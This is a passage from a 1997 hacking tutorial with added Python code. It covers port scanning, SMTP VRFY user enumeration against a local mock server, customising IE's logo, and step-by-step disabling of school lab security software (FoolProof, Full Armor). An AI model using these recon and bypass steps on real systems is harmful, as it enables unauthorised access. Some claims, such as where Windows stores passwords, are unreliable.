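    if "\xff" in banner:                       # raw telnet option negotiation (IAC bytes)
        return "telnet"
    return "unknown"

def grab_banner(host: str, port: int, timeout: float = 2.0):
    """(state, banner) with state "open", "closed" or "filtered".  Nothing is sent first."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(512).decode("latin-1").strip()
            except socket.timeout:
                banner = ""                    # open but silent, e.g. HTTP waits for a request
            return "open", banner
    except ConnectionRefusedError:
        return "closed", ""
    except OSError:                            # connect timeout, no route, firewall drop
        return "filtered", ""

def scan(host: str, ports) -> dict:
    """{port: (RFC 1700 name, name guessed from banner, banner)} for every open port."""
    found = {}
    for port in ports:
        state, banner = grab_banner(host, port)
        if state == "open":
            found[port] = (RFC1700_NAMES.get(port, "unassigned"), classify(banner), banner)
    return found

def _reply_code(sock) -> int:
    """Read one SMTP reply line; return its three-digit code, 0 if unparseable."""
    line = b""
    while not line.endswith(b"\r\n"):
        chunk = sock.recv(256)
        if not chunk:
            break
        line += chunk
    return int(line[:3]) if line[:3].isdigit() else 0

def smtp_vrfy(host: str, port: int, user: str, timeout: float = 2.0) -> int:
    """sendmail's verify command: 250 = account exists, 550 = it does not,
    252 = the administrator turned VRFY off, as the Guide advises."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        _reply_code(s)                                    # greeting
        s.sendall(b"HELO scanner.example\r\n")            # hypothetical client name
        _reply_code(s)
        s.sendall(b"VRFY " + user.encode() + b"\r\n")
        code = _reply_code(s)
        s.sendall(b"QUIT\r\n")
        return code

def free_port() -> int:
    """A port nothing listens on, to show what a closed port looks like to the scanner."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def fake_sendmail(users, banner=b"220 fubar.com ESMTP Sendmail (constructed banner)\r\n") -> int:
    """Constructed target on 127.0.0.1 so the scan runs offline; returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        conn.sendall(banner)
        buf = b""
        while chunk := conn.recv(256):
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                verb, _, arg = line.decode("latin-1").partition(" ")
                if verb.upper() == "QUIT":
                    conn.sendall(b"221 bye\r\n")
                    return
                if verb.upper() == "VRFY":
                    conn.sendall(b"250 ok\r\n" if arg.strip() in users else b"550 user unknown\r\n")
                else:
                    conn.sendall(b"250 ok\r\n")

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    handle(conn)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

if __name__ == "__main__":
    port = fake_sendmail({"cmeinel", "bob"})
    print(scan("127.0.0.1", [port]))
    print(smtp_vrfy("127.0.0.1", port, "cmeinel"), smtp_vrfy("127.0.0.1", port, "nobody"))
```

Point scan() at a real host and it behaves exactly like the hand scan, including the part the Guide warns about: every connect shows up in that host’s logs, and a tcp_wrappers-style tripwire on any port will fire on the very first one.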

2. Understand the operating system of the computer you plan to crack. Sure, lots of people who are ignorant on operating systems break into computers by using canned programs against pitifully vulnerable boxes. As one teen hacker told me after returning from Def Con V, “Many of the guys there didn’t even know the ‘cat’ command!”

Anyone can break into some computer somewhere if they have no pride or ethics. We assume you are better than that. If the breakin is so easy you can do it without having a clue what the command “cat” is, you aren’t a hacker. You’re just a computer vandal.

3. Study the ways other people have broken into a computer with that operating system and software. The best archives of breakin techniques for Unix are Bugtraq http://www.netspace.org/lsv-archive/bugtraq.html. For Windows NT, check out http://ntbugtraq.rc.on.ca/index.html.

A cheap and easy partial shortcut to this arduous learning process is to run a program that scans the ports of your target computer, finds out what daemons are running on each port, and then tells you whether there are breakin techniques known to exist for those daemons. SATAN (the Security Administrator Tool for Analyzing Networks) is a good one, and absolutely free. You can download it from ftp://ftp.fc.net/pub/defcon/SATAN/ or a bazillion other hacker ftp sites.

Another great port scanner is Internet Security Scanner. It is offered by Internet Security Systems of Norcross, Georgia USA, 1-800-776-2362. This tool costs lots of money, but is the security scanner of choice of the people who want to keep hackers out. You can reach ISS at http://www.iss.net/.

Internet Security Systems also offers some freebie programs. The “Localhost” Internet Scanner SAFEsuite is set to only run a security scan on the Unix computer on which it is installed (hack your own box!). You can get it from http://www.blanket.com/iss.html. You can get a free beta copy of their scanner for Win NT at http://www.iss.net/about/whatsnew.html#RS_NT.

In theory ISS programs are set so you can only use them at most to probe computer networks that you own. However, a few months ago I got a credible report that a giant company that uses ISS to test its boxes on the Internet backbone accidentally shut down an ISP in El Paso with an ISS automated syn flood attack.

If you want to get a port scanner from a quiet little place, try out http://204.188.52.99. This offers the Asmodeus Network Security Scanner for Windows NT 4.0.

In most places it is legal to scan the ports of other people’s computers. Nevertheless, if you run Satan or any other port scanning tool against computers that you don’t have permission to break into, you may get kicked off of your ISP.

For example, recently an Irish hacker was running “security audits” of the Emerald Island’s ISPs. He was probably doing this in all sincerity. He emailed each of his targets a list of the vulnerabilities he found. But when this freelance security auditor probed the ISP owned by one of my friends, he got that hacker kicked off his ISP.

“But why give him a hard time for just doing security scans? He may have woken up an administrator or two,” I asked my friend.

“For the same reason they scramble an F-16 for a bogie,” he replied.

The way I get around the problem of getting people mad from port scanning is to do it by hand using a telnet program. Many of the GTMHHs show examples of port scanning by hand. This has the advantage that most systems administrators assume you are merely curious.

However, some have a daemon set up so that every time you scan even one port of their boxes, it automatically sends an email to the systems administrator of the ISP you use complaining that you tried to break in -- and another email to you telling you to turn yourself in!

The solution hackers reach for is IP spoofing, putting someone else’s address on the scan packets. Keep in mind that a TCP connection to a spoofed address never completes from your side, so a spoofed scan hides you while telling you nothing. And since I’m sure you are only going to try to break into computers where you have permission to do so, you don’t need to know how to spoof your IP address.

******************************************************
You may laugh yourself silly warning: If you port scan by hand against obscure.sekurity.org, you may run into some hilarious daemons installed on weird high port numbers.
******************************************************

4. Now that you know what vulnerable programs are running on your target computer, next you need to decide what program you use to break in.

But aren’t hackers brilliant geniuses that discover new ways to break into computers? Yes, some are. But the average hacker relies on programs other hackers have written to do their deeds. That’s why, in the book Takedown, some hacker (maybe Kevin Mitnick, maybe not) broke into Tsutomu Shimomura’s computer to steal software for turning an Oki cell phone into a scanner that could eavesdrop on other people’s cell phone calls.

This is where those zillions of hacker web pages come into play. Do a web search for “hacker” and “haxor” and “h4ck3r” etc. You can spend months downloading all those programs with promising names like “IP spoofer.”

Unfortunately, you may be in for an ugly surprise or two. This may come as a total shock to you, but some of the people who write programs that are used to break into computers are not exactly Eagle Scouts.

For example, the other day a fellow who shall remain nameless wrote to me “I discovered a person has been looting my www dir, where I upload stuff for friends so I am gonna leave a nice little surprise for him in a very cool looking program ;)  (if you know what I mean)”

But let’s say you download a program that promises to exploit that security hole you just found with a Satan scan. Let’s say you aren’t going to destroy all your files from some nice little surprise. Your next task may be to get this exploit program to compile and run.

Most computer breakin programs run on Unix. And there are many different flavors of Unix, with several shells to choose from on each. (If none of this makes sense to you, see the GTMHHs on how to get a good shell account.) A compiled exploit written for, say, Solaris on a SPARC will not build unchanged on Slackware Linux or Irix, because system calls, libraries and memory layout differ, and a shell script written for csh may fail under bash or tcsh.

It is also possible that the guy who wrote that breakin program may have a conscience. He or she may have figured that most people would want to use it maliciously. So they made a few little teeny weeny changes to the program, for example commenting out some lines.  So Mr./Ms. Tender Conscience can feel that only people who know how to program will be able to use that exploit software. And as we all know, computer programmers would never, ever do something mean and horrible to someone else’s computer.

So this brings us to the next thing you should know in order to break into computers.

5. Learn how to program! Even if you use other peoples’ exploit programs, you may need to tweak a thing or two to get them to run. The two most common languages for exploit programs are probably C (or C++) and Perl.

********************************************
Newbie note: If you can’t get that program you just downloaded to run, it may be that it is designed to be compiled and run on the Unix operating system, but you are running Windows. A good tip-off is a file name ending in “.tar.gz” or “.tgz”: that is a gzip-compressed source archive, which you unpack and build with a C compiler rather than double-click.
********************************************

So, does all this mean that breaking into computers is really, really hard? Does all this mean that if you break into someone’s computer you have proven your digital manhood (or womanhood)?

No. Some computers are ridiculously easy to break into. But if you break into a poorly defended computer run by dunces, all you have proven is that you lack good taste and like to get into really stupid kinds of trouble. However, if you manage to break into a computer that is well managed, and that you have permission to test, you are on your way to a high paying career in computer security.

Remember this!  If you get busted for breaking into a computer, you are in trouble big time. Even if you say you did no harm. Even if you say you made the computer better while you were prowling around in it. And your chances of becoming a computer security professional drop almost to zero. And -- do you have any idea of how expensive lawyers are?

I haven’t even hinted in this tutorial at how to keep from getting caught. It is at least as hard to cover your tracks as it is to break into a computer. So if you had to read this to learn how to break into computers, you are going to wind up in a world of hurt if you use this to trespass in other people’s computers.

So, which way do you plan to go? To be known as a good guy, making tons of money, and having all the hacker fun you can imagine?

Or are you going to slink around in the dark, compulsively breaking into strangers’ computers, poor, afraid, angry? Busted? Staring at astronomical legal bills?

If you like the rich and happy alternative, check out back issues of the Happy Hacker Digests to see what computers are open to the public to try to crack into. We’ll also make new announcements as we discover them.

And don’t forget to try to crack obscure.sekurity.org. No one has managed to break it when attacking from the outside. I don’t have a clue of how to get inside it, either. You may have to discover a new exploit to breach its defenses.

But if you do, you will have experienced a thrill that is far greater than breaking into some Lower Slobovian businessman’s 386 box running Linux 2.0 with sendmail 4.whatever. Show some chivalry and please don’t beat up on the helpless, OK? And stay out of jail or we will all make fun of you when you get caught.

Of course this Guide barely scrapes the surface of breaking into computers. We haven’t even touched on topics such as how to look for back doors that other crackers may have hidden on your target computer, or keystroke grabbers, or attacks through malicious code you may encounter while browsing the Web. (Turn off Java on your browser! Never, ever use Internet Explorer.) But maybe some of you ubergenius types reading this could help us out. Hope to hear from you!
____________________________________________________________
Warning! Use this information at your own risk. Get busted for trying this out on some Lower Slobovian businessman’s computer and we will all make fun of you, I promise! That goes double for Upper Slobovian boxes!!
Want to see back issues of Guide to (mostly) Harmless Hacking? See http://goodweb.scol.net/hacker/index.html(the official Happy Hacker archive site).
Subscribe to our discussion list by emailing to hacker@techbroker.com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to list@techbroker.com.  To send me confidential email (please, no discussions of illegal activities) use cmeinel@techbroker.com and be sure to state in your message that you want me to keep this confidential. If you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker.com. Happy hacking! _____________________________________________________
Copyright 1997 Carolyn P. Meinel. You may forward or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. To subscribe, email hacker@techbroker.com with message “subscribe hh.”
________________________________________________________
 

____________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 No. 6

How to Be a Hero in Computer Lab
____________________________________________________________

 If you are a student, you know you can get into trouble if you hack your school’s computers. But if you can persuade your teachers that you are the good guy who will help protect them from digital vandals, you can become a hero. You may even get their permission to try break-in techniques.

************************************************************
In this Guide you will learn how to:
· Customize the animated logo on Internet Explorer
· Circumvent security programs through Internet Explorer
· Circumvent security programs through any Microsoft Office programs
· Circumvent FoolProof
· Circumvent Full Armor
· Solve the web babysitter problem
· Break into absolutely any school computer.
· Keep clueless kiddie hackers from messing up your school computer system
************************************************************

 This Guide will give you some tips for safely proving just how good you are, and maybe even showing your hacker teacher buddies a thing or two. But I would feel really bad if someone were to use the tips in this Guide to mess up his or her life.

************************************************************
You can mess up your life warning: In most countries kids don’t have nearly the legal protections that adults have. If you get involved in a hacker gang at school and you guys get caught, you can easily get expelled from school or even arrested. Even if the authorities don’t have very good proof of your guilt. Even if you are innocent. Arghhh!
************************************************************

 First task of this Guide, then, is how to find teachers who would love to play hacker games with you and give you free run of the schools computer systems. Whoa, you say, now this is some social engineering challenge! But actually this isn’t that hard.

 Coyote suggests, “in many cases you may find that if you prove yourself responsible (i.e.: not acting like a jerk in class and not hacking to be cool), it will be easier to gain the trust of the teacher and subsequently gain the job helping with the systems. And once you reach this level you are almost guaranteed that you will know more about system management, and of course hacking, than you could have by simply breaking in.”

 Here’s the first thing you need to remember. Your teachers are overworked. If they get mad at hackers, it is because computer vandals keep on messing things up. Guess who gets to stay late at work fixing the mess students make when they break into school computers? Right, it’s usually your computer lab teachers.

 Think about it. Your computer lab teachers might really, really, like the idea of having you help with the work. The problem is -- will they dare to trust you?

 Karl Schaffarczyk warns, “I nearly got chucked out of school (many years ago) for pulling up a DOS prompt on a system that was protected against such things.” Sheesh, just for getting a DOS prompt? But the problem is that your teachers go to a lot of effort to set school computers up so they can be used to teach classes. The minute they realize you know how to get to DOS, they know you could mess things up so bad they will have to spend a sleepless night -- or two or three -- putting that computer back together. Teachers hate to stay up all night. Imagine that!

 So if you really want to work a deal where you become supreme ruler and hero-in-chief of your school’s computers, don’t start by getting caught! Don’t start even by showing your teacher, “Hey, look how easy it is to get a DOS prompt!” Remember, some authorities will immediately kick you out of school or call the cops.

 Honest, many people are terrified of teenage hackers. You can’t really blame them, either, when you consider those news stories. Here are some examples of stories your school authorities have probably read.

- 13 FEBRUARY 1997: Hackers are reported to be using servers at Southampton University to circulate threatening emails (that) ... instruct recipients to cancel credit cards, claiming their security has been breached. (c) VNU Business Publications Limited, 1997, NETWORK NEWS 7/5/97 P39
- A teenager was fined an equivalent of US$350 for paralysing US telephone switchboards...The unnamed teenager made around 60,000 calls... (C) 1997 M2 Communications Ltd., TELECOMWORLDWIRE 6/5/97
- WORLDCOM in the UK recently suffered a systems failure following a hacker attack... (C) 1997 M2 Communications Ltd., TELECOMWORLDWIRE 6/5/97
 
 Scary, huh? It’s not surprising that nowadays some people are so afraid of hackers that they blame almost anything on us. For example, in 1997, authorities at a naval base at first blamed attackers using high-energy radio waves for computer screens that froze. Later investigators learned that ship radars, not hackers, were freezing screens.

 So instead of getting mad at teachers who are terrified of hackers, give them a break. The media is inundating them with scare stories. Plus which they have probably spent a lot of time fixing messes made by kiddie hackers. Your job is to show them that you are the good guy. Your job is to show them you can make life better for them by giving you free run of the school computers.

 This same basic technique also will work with your ISP.
If you offer to help for free, and if you convince them you are responsible, you can get the right to have root (or administrative) access to almost any computer system. For example, I was talking with the owner of an ISP one day, who complained how overworked he was. I told him I knew a high school sophomore who had been busted for hacking but had reformed. This fellow, I promised, would work for free in exchange for the root password on one of his boxes. Next day they did the deal.
 
 Now this hacker and his friends get to play break-in games on this computer during off hours when paying customers don’t use it. In exchange, those kids fix anything that goes wrong with that box.

 So try it. Find an overworked teacher. Or overworked owner of an ISP. Offer to show him or her that you know enough to help take care of those computers.

 But how do you prove you know enough for the job?

 If you start out by telling your computer lab teacher that you know how to break into the school computers, some teachers will get excited and suspend you from school. Just in case your teacher is the kind who gets scared by all those hacker news stories, don’t start out by talking about breaking in! Instead, start with showing them, with their permission, a few cheap tricks.

Cheap Internet Explorer Tricks

 A good place to start is with Internet Explorer.

 For starters, what could be more harmless -- yet effective at showing off your talents -- than changing the animated logo on Internet Explorer (IE)? (Netscape’s can be changed too, but the steps below are for IE.)

 You could do it the easy way with Microangelo, available from ftp://ftp.impactsoft.com/pub/impactsoft/ma21.zip. But since you are a hacker, you may want to impress your teachers by doing it the hacker way.
1) Bring up Paint.
2) Click “image,” then “attributes.”
3) Choose width = 40, height = 480, units in pels (pixels).
4) Make a series of pictures, each 40x40 pels. One way to do this is to open a new picture for each one and set attributes to width = 40 and height = 40. Then cut and paste each one into the 40x480 image.
5) Make the top 40x40 image be the one you want to have sit there when IE is doing nothing. The next three are shown once when a download starts, and the rest are played in a loop until the download is done. You must have an even number of images for this to work.
6)Now run the Registry editor. This is well hidden since Microsoft would prefer that you not play with the Registry. One way is to click “start,” then “programs” then “MS-DOS,” and then in the MS-DOS window with the C:\windows prompt give the command “regedit.”
7) Click to highlight the subkey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar"
8) On the menu bar, click “Edit,” then “Find.” Type “BrandBitmap” in the find window.
9) Now double click on BrandBitmap to get a dialog window. Type the path and file name of your custom animated graphic into it.
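The nine steps above, done the hacker way in code, as an added example that is not from the Guide: a Python script that stacks twelve 40x40 frames into the 40x480 strip as a 24-bit Windows BMP, and writes the .reg file that performs steps 6 to 9 (the BrandBitmap value under the Internet Explorer\Toolbar key). The frame artwork is a placeholder pattern and C:\frames.bmp is an assumed path; change both to taste. The one gotcha worth seeing in code is that BMP stores rows bottom-up, so the idle frame that must be at the top of the strip is the last one written.

```python
import struct

# Added example, not from the Guide: builds the 40x480 strip of twelve 40x40 frames that the
# steps above have you paint by hand, as a 24-bit Windows BMP, and writes the .reg file that
# points IE's BrandBitmap value at it.  The artwork and the C:\frames.bmp path are placeholders.

FRAME = 40                    # IE logo frames are 40x40 pixels
FRAMES = 12                   # twelve frames make the 40x480 strip the steps describe
BMP_PATH = r"C:\frames.bmp"   # assumption: where the strip will live on the target box


def make_frame(i: int):
    """Frame i: a diagonal band that moves one pixel per frame, so the strip animates."""
    rows = []
    for y in range(FRAME):
        row = []
        for x in range(FRAME):
            on_band = (x + y + i) % FRAME < 6
            row.append((255, 255, 255) if on_band else (20 * i, 0, 255 - 20 * i))
        rows.append(row)
    return rows


def build_strip(frames) -> bytes:
    """Stack frames top to bottom into one 24-bit BMP.  BMP stores rows bottom-up, so the
    first (idle) frame is written last; forget this and the animation plays upside down."""
    width, height = FRAME, FRAME * len(frames)
    row_bytes = (width * 3 + 3) & ~3                 # each row padded to a 4-byte boundary
    pixel_bytes = row_bytes * height
    header = struct.pack("<2sIHHI", b"BM", 14 + 40 + pixel_bytes, 0, 0, 54)
    dib = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, pixel_bytes, 2835, 2835, 0, 0)
    out = bytearray(header + dib)
    for y in range(height - 1, -1, -1):              # bottom row of the strip first
        frame, local_y = divmod(y, FRAME)
        for r, g, b in frames[frame][local_y]:
            out += bytes((b, g, r))                  # BMP pixels are stored B, G, R
        out += b"\0" * (row_bytes - width * 3)
    return bytes(out)


def bmp_info(data: bytes):
    """Read back (width, height, bits per pixel) from a BMP header."""
    width, height, _planes, bpp = struct.unpack_from("<iiHH", data, 18)
    return width, height, bpp


def pixel(data: bytes, x: int, y: int):
    """(r, g, b) at top-left-origin coordinates, undoing the bottom-up storage."""
    width, height, _ = bmp_info(data)
    row_bytes = (width * 3 + 3) & ~3
    offset = 54 + (height - 1 - y) * row_bytes + x * 3
    b, g, r = data[offset:offset + 3]
    return r, g, b


def reg_file(bmp_path: str = BMP_PATH) -> str:
    """Registry script equivalent to steps 6-9; double-click it or run `regedit /s brand.reg`."""
    escaped = bmp_path.replace("\\", "\\\\")         # .reg string values escape backslashes
    return ("REGEDIT4\r\n\r\n"
            "[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Toolbar]\r\n"
            f'"BrandBitmap"="{escaped}"\r\n')


if __name__ == "__main__":
    strip = build_strip([make_frame(i) for i in range(FRAMES)])
    with open("frames.bmp", "wb") as f:
        f.write(strip)
    with open("brand.reg", "w", newline="") as f:
        f.write(reg_file())
```

Copy frames.bmp to the path named in the .reg file before importing it, and keep the .reg file: deleting the BrandBitmap value again is the same one-line edit in reverse.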

 So let’s say you set up a flaming skull that rotates when you run IE. Your teacher is impressed. Now she wants you to put it back the way it was before. This is easy. Just open up BrandBitmap, and delete the name of your animation file. Internet Explorer will then automatically revert to the saved graphic in BackBitmap.

 Let’s now show your teacher something that is a little bit scary. Did you know that Internet Explorer (IE) can be used to break some Windows babysitter programs? Your school might be running one of them. If you play this right, you can win points by trashing that babysitter program.

 Yes, you could just get to work on those babysitter programs using the tips of the GTMHH on how to break into Win95. However, we will also look at a new way to get around them in this chapter, using IE. The advantage of using IE when your teacher is anxiously looking over your shoulder is that you could just “accidentally” stumble on some cool stuff, instead of looking like a dangerous hacker. Then you could show that you know how to take advantage of that security flaw.

 Besides, if it turns out the security program you try to override is well enough written to keep IE from breaking it, you don’t look like a dummy.

************************************************************
Evil Genius tip: People are less afraid of you if you type sloowwwlllllyyyyyyyyyy.
************************************************************

  The dirty little secret is that IE doubles as a Windows shell program. It shares its file-browsing code with Windows Explorer, so from IE you can browse the local disks and launch any program, just as you could from the Program Manager or Windows Explorer that come with the Win 95 and Win NT operating systems. In effect it is an alternative to the Win95 desktop.
 
 Yes, from the IE shell you can run any program on your computer -- unless the security program you are trying to break has anticipated this attack. With a little ingenuity you may be able to even gain control of your school’s LAN. But don’t try that just yet!

************************************************************
Newbie note: A shell is a program that mediates between you and the operating system. The big deal about IE being a Windows shell is that Microsoft never told anyone that it was in fact a shell. The security problems that are plaguing IE are mostly a consequence of it turning out to be a shell. By contrast, the Netscape and Mosaic Web browsers are not quite such full-featured shells. This makes them safer to use. But you can still do some interesting things with them to break into a Win95 box. Experiment and have fun!
************************************************************

 To use IE as a Win95 shell, bring it up just like you would if you were going to surf the Web. If your computer is set to automatically initiate an Internet connection, you can kill it. You don’t need to be online for this to work.

  Now here are a few fun suggestions. In the space where you would normally type in the URL you want to surf, instead type in c:\

 Whoa, look at all those file folders that come up on the screen. Now for fun, click “Program Files” then click “Accessories” then click “Paint.” All of a sudden Paint is running. Now paint your teacher who is watching this hack surprised.

 Next close all that stuff and get back to the URL window in IE. Click on the Windows folder, then click on Regedit.exe to start it up. Export the password file (it’s in HKEY_CLASSES_ROOT). Open it in WordPad. Remember, the ability to control the Registry of a server is the key to controlling the network it serves. Show this to your teacher and tell her that you’re going to use IE to change all the school’s password files. In a few hours the Secret Service will be fighting with the FBI on your front lawn over who gets to try to bust you. OK, only kidding here.
 
 No, maybe it would be a bit better to tell your teacher that if you can edit the registry, you can get total control over that computer. And maybe much more. Suggest that the school delete IE from all its computers. You are on the road to being a hero.

 If you actually do edit the Registry, you had better know how to revert to its backup, or else undo your changes. Otherwise you will be making more work for the computer lab teacher instead of less work. Remember, the objective is to prove to your teachers you can cut how much work they have to do!

 What if the school babysitter program won’t let you run regedit.exe? Try typing c:/command.com. Then see Chapter 2 for how to edit the Registry from DOS.

 If you have gotten this far with IE, next try entering r:/ or w:/ or z: etc. to see if you can access the disk of a network server. Be sure to do this with your teacher watching and with her permission to try to access network computers. If you succeed, now you have a really good reason to ask her to take IE off all the school computers. This is because you have just taken over the entire school LAN. But you are a hero because you have done it to save your school from those mean kiddie hackers who change grades and class assignments.

 By now you have a great shot at getting a volunteer job running the school’s computer systems. Before you know it, you and your friends will be openly playing Quake at school -- and the authorities will consider it a small price to pay for your expertise.

Cheap Tricks with Microsoft Office

 You also can run a Windows shell from several Microsoft Office programs. Remember, once you get a shell, you have a good shot at disabling security programs.

 The following exploit works with Microsoft Word, Excel, and Powerpoint. To use them to get into a Windows shell:
1) Click “help”, then “About Microsoft (name of program inserted here),” then “System Info...”
2) This brings up a window which includes a button labeled “run.” Click “run” and put in anything you want, for example regedit.exe! (That is, unless the security program you are trying to break has a way to disable this.)

 Microsoft Access is a bit harder. The “run” button only gives a few choices. One of them is File Manager. But File Manager is also a Windows shell. From it you can run any program. (That is, unless the security program you are trying to break has a way to disable this.)

How to Circumvent FoolProof
 
 There is usually a hotkey to turn off FoolProof. One young hacker reports his school uses shift-alt-X (hold down the shift and alt keys at the same time, then press the “x” key.) Of course other schools may have other arrangements.

 If you get the hotkey right, a sound may play, and a lock in the lower-right corner should open for 20-30 seconds.
 
 Dante tells how he managed to get out of a hot spot with an even better hack of Fool Proof. “My computer science teacher asked me to show her exactly HOW I managed to print the ‘the universe revolves around me’ image I made to all the network printers in the school...” So he had her watch while he did the deed.

************************************************************
You can get punched in the nose warning: Dante was lucky that his teacher was understanding. In some schools a harmless joke like this would be grounds for expulsion.
************************************************************

 Here is how Dante -- and anyone -- may disable FoolProof.
1) First, break into the Windows box using one of the techniques of the GTMHHs on Hacking Windows. Warning -- don’t try the soldering iron bit. Your teacher will faint.
2) Now you can edit the autoexec.bat and config.sys files. (Be sure to back them up.) In config.sys delete the line device=fp, and in autoexec.bat, delete fptsr.exe.
3) Run regedit.exe. You have to remove FoolProof from the Registry, too. Use the Regedit search feature to find references to Fool Proof.
4) Find the Registry backup files and make copies with different names just in case. Making a mistake with the Registry can cause spectacular messes!
5) Save the registry, and reboot. FoolProof won’t load.
6) To put things back the way they were, rename the backup files.
 You are now the school hero security expert.

How to Circumvent Full Armor

  “I ran up against this program 8 months ago at school, they attempted to prevent people from writing to the hard drive. It presented itself as a challenge....for about 5 minutes.” -- Dave Manges.

 Here’s how Dave tells us he did the deed:
1) In the properties of the program it mentions the thread file (can't remember the name of the file); it was something.vbx.
2) OK...this is easy enough: open notepad, open something.vbx.
3) Just because I can't write to the hard drive doesn't mean I can't edit something already there; delete the first character from the file.
4) The file (opened in notepad) looks like garbage, but if memory serves the first letter was M.
5) Save the file and restart the computer; it should come up with an error like "Unable to Initialize Full Armor".
6) Now you can go into add/remove programs and uninstall it.

 Again, remember to back up all files before changing them so you can put the computer back the way you found it.

Solve the Web Babysitter Problem

 Suppose your next goal is to get rid of Web babysitter programs. But this can be a tough job. Think about it from the point of view of the teachers. If even one kid were to complain to her parents that she had seen dirty movies running on other kids’ monitors in computer lab, your school would be in big trouble. So merely blasting your way through those babysitter programs with techniques such as those you learned in Chapter 2 will solve the problem for only a short time -- and get you and your teacher and your school in trouble.

 But once again you can be a hero. You can help your teachers discover the Web sites that are being blocked by those babysitter programs. They may be surprised to find out that these programs block lots more than naughty pictures. They often secretly censor certain political sites, too.

 If your school is running CYBERsitter, you can really beat up on it. CYBERsitter has encrypted its list of banned sites, which include those with political beliefs they don’t like. But you can download a program to decrypt this list at: http://peacefire.org/info/hackTHIS.shtml. (This Web site is maintained by a teen organization, Peacefire, devoted to freedom of speech.)
 
 When your teacher discovers the hidden political agenda of CYBERsitter, you are a hero. Unless, of course, your teacher agrees with CYBERsitter’s tactics. If so, you can probably find other teachers in your school who will be appalled by CYBERsitter.

  How about IE’s built-in site blocking system? It is harder to uncover what it blocks because it works by limiting the viewer to web sites that have “certificates” provided by a number of organizations. If a site hasn’t gone to the effort of getting a certificate, IE can keep you from seeing it.

 Of course, after reading Chapter 2, you can quickly disable the IE censorship feature. But instead of doing this, how about directing your teacher to http://peacefire.org and let him or her follow the links? Then perhaps the authorities at your school will be ready to negotiate with you to find a way to give you freedom to surf without grossing out other kids in the computer lab or library who can’t help but notice what may be on your monitor.

How to Break into Absolutely any School Computer

 As you know from Chapter 2, you can break into any computer to which you have physical access. The trick is to figure out, once you have complete control, how to disable whatever program is giving you a hard time.

 There are only a few possible ways for these programs to work. Maybe all you need to do is control-alt-delete and remove it from the list of active programs that brings up.

 If this doesn’t work, and if you can get into DOS, you can edit any files. See Chapter 1 for details on all the ways to get to DOS. Or you may only need to access regedit.exe. You can run it from either DOS or, depending on how good your problem program is, from Windows.

 Once you can edit files, the ones you are likely to need to alter are autoexec.bat, config.sys, anything with the extension .pwl or .lnk, \windows\startm~1\programs\startup, and the Registry. Look for lines with suspicious names that remind you of the name of the program you want to disable.
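 The same load points (config.sys, autoexec.bat and the Startup folder) are what a lab teacher should check after a session, to confirm that a security program’s entries such as the device=fp and fptsr.exe lines from the FoolProof section are still there and to spot anything nobody installed. The following inventory script is an added example written for this Guide’s readers, not code from the Guide or from any of the products it names. The file contents, directory paths (C:\FP, C:\TEMP\LOADER.EXE and so on), the Startup-folder listing and the baseline of known-good drivers are all constructed; only the file names FP.SYS and FPTSR.EXE follow the Guide’s text, and their exact paths are an assumption.

```python
"""Boot load-point inventory for DOS/Win95 config files (added example).

Parses config.sys and autoexec.bat text plus a Startup-folder listing, reports
every driver or program they load, and flags (a) expected security entries that
have gone missing and (b) entries that are neither expected nor on a known-good
baseline.  All sample contents below are constructed; FP.SYS and FPTSR.EXE are
the FoolProof entries the Guide names (their paths are assumed).
"""
import ntpath

# --- constructed sample input (not real school files) ---------------------
CONFIG_SYS = r"""
DEVICE=C:\WINDOWS\HIMEM.SYS
DEVICE=C:\WINDOWS\EMM386.EXE NOEMS
DEVICEHIGH=C:\FP\FP.SYS
FILES=40
REM DEVICE=C:\OLD\DRIVER.SYS
"""

AUTOEXEC_BAT = r"""
@ECHO OFF
PATH=C:\WINDOWS;C:\WINDOWS\COMMAND
SET TEMP=C:\TEMP
LH C:\WINDOWS\COMMAND\MSCDEX.EXE /D:MSCD001
C:\FP\FPTSR.EXE
C:\TEMP\LOADER.EXE
REM C:\OLD\THING.EXE
"""

# The same autoexec.bat with the FoolProof TSR line removed, i.e. the state
# the file is left in after the edit described in the Guide.
TAMPERED_AUTOEXEC = AUTOEXEC_BAT.replace("C:\\FP\\FPTSR.EXE\n", "")

# Constructed \windows\startm~1\programs\startup directory listing.
STARTUP_ITEMS = ["Office Startup.lnk"]

EXPECTED = ["FP.SYS", "FPTSR.EXE"]                        # must be present
BASELINE = {"HIMEM.SYS", "EMM386.EXE", "MSCDEX.EXE",      # known-good entries
            "OFFICE STARTUP.LNK"}

BATCH_BUILTINS = {"ECHO", "PATH", "SET", "PROMPT", "CLS", "CALL", "IF",
                  "GOTO", "MODE", "KEYB", "CD", "MD", "VER", "PAUSE"}
CONFIG_LOADERS = ("DEVICE", "DEVICEHIGH", "INSTALL", "INSTALLHIGH")


def _basename(path):
    """Upper-cased file name from a DOS path, independent of the host OS."""
    return ntpath.basename(path).upper()


def config_sys_loads(text):
    """Return (directive, file) pairs for each driver/program config.sys loads."""
    loads = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.split()[0].upper() == "REM":
            continue                                   # blank or commented out
        key, sep, value = line.partition("=")
        parts = value.split()
        if sep and key.strip().upper() in CONFIG_LOADERS and parts:
            loads.append((key.strip().upper(), _basename(parts[0])))
    return loads


def autoexec_loads(text):
    """Return file names of programs autoexec.bat runs (LH/LOADHIGH stripped)."""
    loads = []
    for raw in text.splitlines():
        words = raw.strip().lstrip("@").split()
        if not words:
            continue
        if words[0].upper() in ("LH", "LOADHIGH"):     # load-high prefix
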